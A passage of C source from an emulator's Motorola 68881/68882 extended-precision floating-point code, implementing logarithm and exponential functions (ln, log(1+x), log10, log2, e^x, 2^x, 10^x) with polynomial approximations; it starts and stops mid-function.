uint64_t aSig, bSig; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); bSig = extractFloatx80Frac(b); bExp = extractFloatx80Exp(b); bSign = extractFloatx80Sign(b); if (bExp == 0x7FFF) { if ((uint64_t) (bSig << 1) || ((aExp == 0x7FFF) && (uint64_t) (aSig << 1))) { return propagateFloatx80NaN(a, b, status); } float_raise(float_flag_invalid , status); return floatx80_default_nan(status); } if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaN(a, b, status); } return packFloatx80(aSign, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0) { if (aSig == 0) { return packFloatx80(aSign, 0, 0); } if (bExp < 0x3FFF) { return a; } normalizeFloatx80Subnormal(aSig, &aExp, &aSig); } if (bExp < 0x3FFF) { return a; } if (0x400F < bExp) { aExp = bSign ? -0x6001 : 0xE000; return roundAndPackFloatx80(status->floatx80_rounding_precision, aSign, aExp, aSig, 0, status); } shiftCount = 0x403E - bExp; bSig >>= shiftCount; aExp = bSign ? (aExp - bSig) : (aExp + bSig); return roundAndPackFloatx80(status->floatx80_rounding_precision, aSign, aExp, aSig, 0, status); } floatx80 floatx80_move(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t)(aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } return a; } if (aExp == 0) { if (aSig == 0) { return a; } normalizeRoundAndPackFloatx80(status->floatx80_rounding_precision, aSign, aExp, aSig, 0, status); } return roundAndPackFloatx80(status->floatx80_rounding_precision, aSign, aExp, aSig, 0, status); } /* * Algorithms for transcendental functions supported by MC68881 and MC68882 * mathematical coprocessors. The functions are derived from FPSP library. */ #define one_exp 0x3FFF #define one_sig UINT64_C(0x8000000000000000) /* * Function for compactifying extended double-precision floating point values. */ static int32_t floatx80_make_compact(int32_t aExp, uint64_t aSig) { return (aExp << 16) | (aSig >> 48); } /* * Log base e of x plus 1 */ floatx80 floatx80_lognp1(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig, fSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, j, k; floatx80 fp0, fp1, fp2, fp3, f, logof2, klog2, saveu; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { propagateFloatx80NaNOneArg(a, status); } if (aSign) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } if (aSign && aExp >= one_exp) { if (aExp == one_exp && aSig == one_sig) { float_raise(float_flag_divbyzero, status); return packFloatx80(aSign, floatx80_infinity.high, floatx80_infinity.low); } float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } if (aExp < 0x3f99 || (aExp == 0x3f99 && aSig == one_sig)) { /* <= min threshold */ float_raise(float_flag_inexact, status); return floatx80_move(a, status); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); fp0 = a; /* Z */ fp1 = a; fp0 = floatx80_add(fp0, float32_to_floatx80(make_float32(0x3F800000), status), status); /* X = (1+Z) */ aExp = extractFloatx80Exp(fp0); aSig = extractFloatx80Frac(fp0); compact = floatx80_make_compact(aExp, aSig); if (compact < 0x3FFE8000 || compact > 0x3FFFC000) { /* |X| < 1/2 or |X| > 3/2 */ k = aExp - 0x3FFF; fp1 = int32_to_floatx80(k, status); fSig = (aSig & UINT64_C(0xFE00000000000000)) | UINT64_C(0x0100000000000000); j = (fSig >> 56) & 0x7E; /* DISPLACEMENT FOR 1/F */ f = packFloatx80(0, 0x3FFF, fSig); /* F */ fp0 = packFloatx80(0, 0x3FFF, aSig); /* Y */ fp0 = floatx80_sub(fp0, f, status); /* Y-F */ lp1cont1: /* LP1CONT1 */ fp0 = floatx80_mul(fp0, log_tbl[j], status); /* FP0 IS U = (Y-F)/F */ logof2 = packFloatx80(0, 0x3FFE, UINT64_C(0xB17217F7D1CF79AC)); klog2 = floatx80_mul(fp1, logof2, status); /* FP1 IS K*LOG2 */ fp2 = floatx80_mul(fp0, fp0, status); /* FP2 IS V=U*U */ fp3 = fp2; fp1 = fp2; fp1 = floatx80_mul(fp1, float64_to_floatx80( make_float64(0x3FC2499AB5E4040B), status), status); /* V*A6 */ fp2 = floatx80_mul(fp2, float64_to_floatx80( make_float64(0xBFC555B5848CB7DB), status), status); /* V*A5 */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FC99999987D8730), status), status); /* A4+V*A6 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0xBFCFFFFFFF6F7E97), status), status); /* A3+V*A5 */ fp1 = floatx80_mul(fp1, fp3, status); /* V*(A4+V*A6) */ fp2 = floatx80_mul(fp2, fp3, status); /* V*(A3+V*A5) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FD55555555555A4), status), status); /* A2+V*(A4+V*A6) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0xBFE0000000000008), status), status); /* A1+V*(A3+V*A5) */ fp1 = floatx80_mul(fp1, fp3, status); /* V*(A2+V*(A4+V*A6)) */ fp2 = floatx80_mul(fp2, fp3, status); /* V*(A1+V*(A3+V*A5)) */ fp1 = floatx80_mul(fp1, fp0, status); /* U*V*(A2+V*(A4+V*A6)) */ fp0 = floatx80_add(fp0, fp2, status); /* U+V*(A1+V*(A3+V*A5)) */ fp1 = floatx80_add(fp1, log_tbl[j + 1], status); /* LOG(F)+U*V*(A2+V*(A4+V*A6)) */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 IS LOG(F) + LOG(1+U) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, klog2, status); float_raise(float_flag_inexact, status); return a; } else if (compact < 0x3FFEF07D || compact > 0x3FFF8841) { /* |X| < 1/16 or |X| > -1/16 */ /* LP1CARE */ fSig = (aSig & UINT64_C(0xFE00000000000000)) | UINT64_C(0x0100000000000000); f = packFloatx80(0, 0x3FFF, fSig); /* F */ j = (fSig >> 56) & 0x7E; /* DISPLACEMENT FOR 1/F */ if (compact >= 0x3FFF8000) { /* 1+Z >= 1 */ /* KISZERO */ fp0 = floatx80_sub(float32_to_floatx80(make_float32(0x3F800000), status), f, status); /* 1-F */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 IS Y-F = (1-F)+Z */ fp1 = packFloatx80(0, 0, 0); /* K = 0 */ } else { /* KISNEG */ fp0 = floatx80_sub(float32_to_floatx80(make_float32(0x40000000), status), f, status); /* 2-F */ fp1 = floatx80_add(fp1, fp1, status); /* 2Z */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 IS Y-F = (2-F)+2Z */ fp1 = packFloatx80(1, one_exp, one_sig); /* K = -1 */ } goto lp1cont1; } else { /* LP1ONE16 */ fp1 = floatx80_add(fp1, fp1, status); /* FP1 IS 2Z */ fp0 = floatx80_add(fp0, float32_to_floatx80(make_float32(0x3F800000), status), status); /* FP0 IS 1+X */ /* LP1CONT2 */ fp1 = floatx80_div(fp1, fp0, status); /* U */ saveu = fp1; fp0 = floatx80_mul(fp1, fp1, status); /* FP0 IS V = U*U */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS W = V*V */ fp3 = float64_to_floatx80(make_float64(0x3F175496ADD7DAD6), status); /* B5 */ fp2 = float64_to_floatx80(make_float64(0x3F3C71C2FE80C7E0), status); /* B4 */ fp3 = floatx80_mul(fp3, fp1, status); /* W*B5 */ fp2 = floatx80_mul(fp2, fp1, status); /* W*B4 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0x3F624924928BCCFF), status), status); /* B3+W*B5 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3F899999999995EC), status), status); /* B2+W*B4 */ fp1 = floatx80_mul(fp1, fp3, status); /* W*(B3+W*B5) */ fp2 = floatx80_mul(fp2, fp0, status); /* V*(B2+W*B4) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FB5555555555555), status), status); /* B1+W*(B3+W*B5) */ fp0 = floatx80_mul(fp0, saveu, status); /* FP0 IS U*V */ fp1 = floatx80_add(fp1, fp2, status); /* B1+W*(B3+W*B5) + V*(B2+W*B4) */ fp0 = floatx80_mul(fp0, fp1, status); /* U*V*([B1+W*(B3+W*B5)] + [V*(B2+W*B4)]) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, saveu, status); /*if (!floatx80_is_zero(a)) { */ float_raise(float_flag_inexact, status); /*} */ return a; } } /* * Log base e */ floatx80 floatx80_logn(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig, fSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, j, k, adjk; floatx80 fp0, fp1, fp2, fp3, f, logof2, klog2, saveu; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { propagateFloatx80NaNOneArg(a, status); } if (aSign == 0) { return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } } adjk = 0; if (aExp == 0) { if (aSig == 0) { /* zero */ float_raise(float_flag_divbyzero, status); return packFloatx80(1, floatx80_infinity.high, floatx80_infinity.low); } if ((aSig & one_sig) == 0) { /* denormal */ normalizeFloatx80Subnormal(aSig, &aExp, &aSig); adjk = -100; aExp += 100; a = packFloatx80(aSign, aExp, aSig); } } if (aSign) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); if (compact < 0x3FFEF07D || compact > 0x3FFF8841) { /* |X| < 15/16 or |X| > 17/16 */ k = aExp - 0x3FFF; k += adjk; fp1 = int32_to_floatx80(k, status); fSig = (aSig & UINT64_C(0xFE00000000000000)) | UINT64_C(0x0100000000000000); j = (fSig >> 56) & 0x7E; /* DISPLACEMENT FOR 1/F */ f = packFloatx80(0, 0x3FFF, fSig); /* F */ fp0 = packFloatx80(0, 0x3FFF, aSig); /* Y */ fp0 = floatx80_sub(fp0, f, status); /* Y-F */ /* LP1CONT1 */ fp0 = floatx80_mul(fp0, log_tbl[j], status); /* FP0 IS U = (Y-F)/F */ logof2 = packFloatx80(0, 0x3FFE, UINT64_C(0xB17217F7D1CF79AC)); klog2 = floatx80_mul(fp1, logof2, status); /* FP1 IS K*LOG2 */ fp2 = floatx80_mul(fp0, fp0, status); /* FP2 IS V=U*U */ fp3 = fp2; fp1 = fp2; fp1 = floatx80_mul(fp1, float64_to_floatx80( make_float64(0x3FC2499AB5E4040B), status), status); /* V*A6 */ fp2 = floatx80_mul(fp2, float64_to_floatx80( make_float64(0xBFC555B5848CB7DB), status), status); /* V*A5 */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FC99999987D8730), status), status); /* A4+V*A6 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0xBFCFFFFFFF6F7E97), status), status); /* A3+V*A5 */ fp1 = floatx80_mul(fp1, fp3, status); /* V*(A4+V*A6) */ fp2 = floatx80_mul(fp2, fp3, status); /* V*(A3+V*A5) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FD55555555555A4), status), status); /* A2+V*(A4+V*A6) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0xBFE0000000000008), status), status); /* A1+V*(A3+V*A5) */ fp1 = floatx80_mul(fp1, fp3, status); /* V*(A2+V*(A4+V*A6)) */ fp2 = floatx80_mul(fp2, fp3, status); /* V*(A1+V*(A3+V*A5)) */ fp1 = floatx80_mul(fp1, fp0, status); /* U*V*(A2+V*(A4+V*A6)) */ fp0 = floatx80_add(fp0, fp2, status); /* U+V*(A1+V*(A3+V*A5)) */ fp1 = floatx80_add(fp1, log_tbl[j + 1], status); /* LOG(F)+U*V*(A2+V*(A4+V*A6)) */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 IS LOG(F) + LOG(1+U) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, klog2, status); float_raise(float_flag_inexact, status); return a; } else { /* |X-1| >= 1/16 */ fp0 = a; fp1 = a; fp1 = floatx80_sub(fp1, float32_to_floatx80(make_float32(0x3F800000), status), status); /* FP1 IS X-1 */ fp0 = floatx80_add(fp0, float32_to_floatx80(make_float32(0x3F800000), status), status); /* FP0 IS X+1 */ fp1 = floatx80_add(fp1, fp1, status); /* FP1 IS 2(X-1) */ /* LP1CONT2 */ fp1 = floatx80_div(fp1, fp0, status); /* U */ saveu = fp1; fp0 = floatx80_mul(fp1, fp1, status); /* FP0 IS V = U*U */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS W = V*V */ fp3 = float64_to_floatx80(make_float64(0x3F175496ADD7DAD6), status); /* B5 */ fp2 = float64_to_floatx80(make_float64(0x3F3C71C2FE80C7E0), status); /* B4 */ fp3 = floatx80_mul(fp3, fp1, status); /* W*B5 */ fp2 = floatx80_mul(fp2, fp1, status); /* W*B4 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0x3F624924928BCCFF), status), status); /* B3+W*B5 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3F899999999995EC), status), status); /* B2+W*B4 */ fp1 = floatx80_mul(fp1, fp3, status); /* W*(B3+W*B5) */ fp2 = floatx80_mul(fp2, fp0, status); /* V*(B2+W*B4) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FB5555555555555), status), status); /* B1+W*(B3+W*B5) */ fp0 = floatx80_mul(fp0, saveu, status); /* FP0 IS U*V */ fp1 = floatx80_add(fp1, fp2, status); /* B1+W*(B3+W*B5) + V*(B2+W*B4) */ fp0 = floatx80_mul(fp0, fp1, status); /* U*V*([B1+W*(B3+W*B5)] + [V*(B2+W*B4)]) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, saveu, status); /*if (!floatx80_is_zero(a)) { */ float_raise(float_flag_inexact, status); /*} */ return a; } } /* * Log base 10 */ floatx80 floatx80_log10(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; floatx80 fp0, fp1; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { propagateFloatx80NaNOneArg(a, status); } if (aSign == 0) { return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } } if (aExp == 0 && aSig == 0) { float_raise(float_flag_divbyzero, status); return packFloatx80(1, floatx80_infinity.high, floatx80_infinity.low); } if (aSign) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; fp0 = floatx80_logn(a, status); fp1 = packFloatx80(0, 0x3FFD, UINT64_C(0xDE5BD8A937287195)); /* INV_L10 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, fp1, status); /* LOGN(X)*INV_L10 */ float_raise(float_flag_inexact, status); return a; } /* * Log base 2 */ floatx80 floatx80_log2(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; floatx80 fp0, fp1; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { propagateFloatx80NaNOneArg(a, status); } if (aSign == 0) { return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } } if (aExp == 0) { if (aSig == 0) { float_raise(float_flag_divbyzero, status); return packFloatx80(1, floatx80_infinity.high, floatx80_infinity.low); } normalizeFloatx80Subnormal(aSig, &aExp, &aSig); } if (aSign) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; if (aSig == one_sig) { /* X is 2^k */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = int32_to_floatx80(aExp - 0x3FFF, status); } else { fp0 = floatx80_logn(a, status); fp1 = packFloatx80(0, 0x3FFF, UINT64_C(0xB8AA3B295C17F0BC)); /* INV_L2 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, fp1, status); /* LOGN(X)*INV_L2 */ } float_raise(float_flag_inexact, status); return a; } /* * e to x */ floatx80 floatx80_etox(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, n, j, k, m, m1; floatx80 fp0, fp1, fp2, fp3, l2, scale, adjscale; flag adjflag; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aSign) { return packFloatx80(0, 0, 0); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(0, one_exp, one_sig); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; adjflag = 0; if (aExp >= 0x3FBE) { /* |X| >= 2^(-65) */ compact = floatx80_make_compact(aExp, aSig); if (compact < 0x400CB167) { /* |X| < 16380 log2 */ fp0 = a; fp1 = a; fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0x42B8AA3B), status), status); /* 64/log2 * X */ adjflag = 0; n = floatx80_to_int32(fp0, status); /* int(64/log2*X) */ fp0 = int32_to_floatx80(n, status); j = n & 0x3F; /* J = N mod 64 */ m = n / 64; /* NOTE: this is really arithmetic right shift by 6 */ if (n < 0 && j) { /* * arithmetic right shift is division and * round towards minus infinity */ m--; } m += 0x3FFF; /* biased exponent of 2^(M) */ expcont1: fp2 = fp0; /* N */ fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0xBC317218), status), status); /* N * L1, L1 = lead(-log2/64) */ l2 = packFloatx80(0, 0x3FDC, UINT64_C(0x82E308654361C4C6)); fp2 = floatx80_mul(fp2, l2, status); /* N * L2, L1+L2 = -log2/64 */ fp0 = floatx80_add(fp0, fp1, status); /* X + N*L1 */ fp0 = floatx80_add(fp0, fp2, status); /* R */ fp1 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp2 = float32_to_floatx80(make_float32(0x3AB60B70), status); /* A5 */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 is S*A5 */ fp3 = floatx80_mul(float32_to_floatx80(make_float32(0x3C088895), status), fp1, status); /* fp3 is S*A4 */ fp2 = floatx80_add(fp2, float64_to_floatx80(make_float64( 0x3FA5555555554431), status), status); /* fp2 is A3+S*A5 */ fp3 = floatx80_add(fp3, float64_to_floatx80(make_float64( 0x3FC5555555554018), status), status); /* fp3 is A2+S*A4 */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 is S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp1, status); /* fp3 is S*(A2+S*A4) */ fp2 = floatx80_add(fp2, float32_to_floatx80( make_float32(0x3F000000), status), status); /* fp2 is A1+S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp0, status); /* fp3 IS R*S*(A2+S*A4) */ fp2 = floatx80_mul(fp2, fp1, status); /* fp2 IS S*(A1+S*(A3+S*A5)) */ fp0 = floatx80_add(fp0, fp3, status); /* fp0 IS R+R*S*(A2+S*A4) */ fp0 = floatx80_add(fp0, fp2, status); /* fp0 IS EXP(R) - 1 */ fp1 = exp_tbl[j]; fp0 = floatx80_mul(fp0, fp1, status); /* 2^(J/64)*(Exp(R)-1) */ fp0 = floatx80_add(fp0, float32_to_floatx80(exp_tbl2[j], status), status); /* accurate 2^(J/64) */ fp0 = floatx80_add(fp0, fp1, status); /* 2^(J/64) + 2^(J/64)*(Exp(R)-1) */ scale = packFloatx80(0, m, one_sig); if (adjflag) { adjscale = packFloatx80(0, m1, one_sig); fp0 = floatx80_mul(fp0, adjscale, status); } status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, scale, status); float_raise(float_flag_inexact, status); return a; } else { /* |X| >= 16380 log2 */ if (compact > 0x400CB27C) { /* |X| >= 16480 log2 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; if (aSign) { a = roundAndPackFloatx80( status->floatx80_rounding_precision, 0, -0x1000, aSig, 0, status); } else { a = roundAndPackFloatx80( status->floatx80_rounding_precision, 0, 0x8000, aSig, 0, status); } float_raise(float_flag_inexact, status); return a; } else { fp0 = a; fp1 = a; fp0 = floatx80_mul(fp0, float32_to_floatx80( make_float32(0x42B8AA3B), status), status); /* 64/log2 * X */ adjflag = 1; n = floatx80_to_int32(fp0, status); /* int(64/log2*X) */ fp0 = int32_to_floatx80(n, status); j = n & 0x3F; /* J = N mod 64 */ /* NOTE: this is really arithmetic right shift by 6 */ k = n / 64; if (n < 0 && j) { /* arithmetic right shift is division and * round towards minus infinity */ k--; } /* NOTE: this is really arithmetic right shift by 1 */ m1 = k / 2; if (k < 0 && (k & 1)) { /* arithmetic right shift is division and * round towards minus infinity */ m1--; } m = k - m1; m1 += 0x3FFF; /* biased exponent of 2^(M1) */ m += 0x3FFF; /* biased exponent of 2^(M) */ goto expcont1; } } } else { /* |X| < 2^(-65) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(a, float32_to_floatx80(make_float32(0x3F800000), status), status); /* 1 + X */ float_raise(float_flag_inexact, status); return a; } } /* * 2 to x */ floatx80 floatx80_twotox(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, n, j, l, m, m1; floatx80 fp0, fp1, fp2, fp3, adjfact, fact1, fact2; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aSign) { return packFloatx80(0, 0, 0); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(0, one_exp, one_sig); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; fp0 = a; compact = floatx80_make_compact(aExp, aSig); if (compact < 0x3FB98000 || compact > 0x400D80C0) { /* |X| > 16480 or |X| < 2^(-70) */ if (compact > 0x3FFF8000) { /* |X| > 16480 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; if (aSign) { return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, -0x1000, aSig, 0, status); } else { return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, 0x8000, aSig, 0, status); } } else { /* |X| < 2^(-70) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80( make_float32(0x3F800000), status), status); /* 1 + X */ float_raise(float_flag_inexact, status); return a; } } else { /* 2^(-70) <= |X| <= 16480 */ fp1 = fp0; /* X */ fp1 = floatx80_mul(fp1, float32_to_floatx80( make_float32(0x42800000), status), status); /* X * 64 */ n = floatx80_to_int32(fp1, status); fp1 = int32_to_floatx80(n, status); j = n & 0x3F; l = n / 64; /* NOTE: this is really arithmetic right shift by 6 */ if (n < 0 && j) { /* * arithmetic right shift is division and * round towards minus infinity */ l--; } m = l / 2; /* NOTE: this is really arithmetic right shift by 1 */ if (l < 0 && (l & 1)) { /* * arithmetic right shift is division and * round towards minus infinity */ m--; } m1 = l - m; m1 += 0x3FFF; /* ADJFACT IS 2^(M') */ adjfact = packFloatx80(0, m1, one_sig); fact1 = exp2_tbl[j]; fact1.high += m; fact2.high = exp2_tbl2[j] >> 16; fact2.high += m; fact2.low = (uint64_t)(exp2_tbl2[j] & 0xFFFF); fact2.low <<= 48; fp1 = floatx80_mul(fp1, float32_to_floatx80( make_float32(0x3C800000), status), status); /* (1/64)*N */ fp0 = floatx80_sub(fp0, fp1, status); /* X - (1/64)*INT(64 X) */ fp2 = packFloatx80(0, 0x3FFE, UINT64_C(0xB17217F7D1CF79AC)); /* LOG2 */ fp0 = floatx80_mul(fp0, fp2, status); /* R */ /* EXPR */ fp1 = floatx80_mul(fp0, fp0, status); /* S = R*R */ fp2 = float64_to_floatx80(make_float64(0x3F56C16D6F7BD0B2), status); /* A5 */ fp3 = float64_to_floatx80(make_float64(0x3F811112302C712C), status); /* A4 */ fp2 = floatx80_mul(fp2, fp1, status); /* S*A5 */ fp3 = floatx80_mul(fp3, fp1, status); /* S*A4 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FA5555555554CC1), status), status); /* A3+S*A5 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0x3FC5555555554A54), status), status); /* A2+S*A4 */ fp2 = floatx80_mul(fp2, fp1, status); /* S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp1, status); /* S*(A2+S*A4) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3FE0000000000000), status), status); /* A1+S*(A3+S*A5) */ fp3 = floatx80_mul(fp3, fp0, status); /* R*S*(A2+S*A4) */ fp2 = floatx80_mul(fp2, fp1, status); /* S*(A1+S*(A3+S*A5)) */ fp0 = floatx80_add(fp0, fp3, status); /* R+R*S*(A2+S*A4) */ fp0 = floatx80_add(fp0, fp2, status); /* EXP(R) - 1 */ fp0 = floatx80_mul(fp0, fact1, status); fp0 = floatx80_add(fp0, fact2, status); fp0 = floatx80_add(fp0, fact1, status); status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, adjfact, status); float_raise(float_flag_inexact, status); return a; } } /* * 10 to x */ floatx80 floatx80_tentox(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, n, j, l, m, m1; floatx80 fp0, fp1, fp2, fp3, adjfact, fact1, fact2; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } if (aSign) { return packFloatx80(0, 0, 0); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(0, one_exp, one_sig); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; fp0 = a; compact = floatx80_make_compact(aExp, aSig); if (compact < 0x3FB98000 || compact > 0x400B9B07) { /* |X| > 16480 LOG2/LOG10 or |X| < 2^(-70) */ if (compact > 0x3FFF8000) { /* |X| > 16480 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; if (aSign) { return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, -0x1000, aSig, 0, status); } else { return roundAndPackFloatx80(status->floatx80_rounding_precision, 0, 0x8000, aSig, 0, status); } } else { /* |X| < 2^(-70) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, float32_to_floatx80( make_float32(0x3F800000), status), status); /* 1 + X */ float_raise(float_flag_inexact, status); return a; } } else { /* 2^(-70) <= |X| <= 16480 LOG 2 / LOG 10 */ fp1 = fp0; /* X */ fp1 = floatx80_mul(fp1, float64_to_floatx80( make_float64(0x406A934F0979A371), status), status); /* X*64*LOG10/LOG2 */ n = floatx80_to_int32(fp1, status); /* N=INT(X*64*LOG10/LOG2) */ fp1 = int32_to_floatx80(n, status); j = n & 0x3F; l = n / 64; /* NOTE: this is really arithmetic right shift by 6 */ if (n < 0 && j) { /* * arithmetic right shift is division and * round towards minus infinity */ l--; } m = l / 2; /* NOTE: this is really arithmetic right shift by 1 */ if (l < 0 && (l & 1)) { /* * arithmetic right shift is division and * round towards minus infinity */ m--; } m1 = l - m; m1 += 0x3FFF; /* ADJFACT IS 2^(M') */ adjfact = packFloatx80(0, m1, one_sig); fact1 = exp2_tbl[j]; fact1.high += m; fact2.high = exp2_tbl2[j] >> 16; fact2.high += m; fact2.low = (uint64_t)(exp2_tbl2[j] & 0xFFFF); fact2.low <<= 48; fp2 = fp1; /* N */ fp1 = floatx80_mul(fp1, float64_to_floatx80( make_float64(0x3F734413509F8000), status), status); /* N*(LOG2/64LOG10)_LEAD */ fp3 = packFloatx80(1, 0x3FCD, 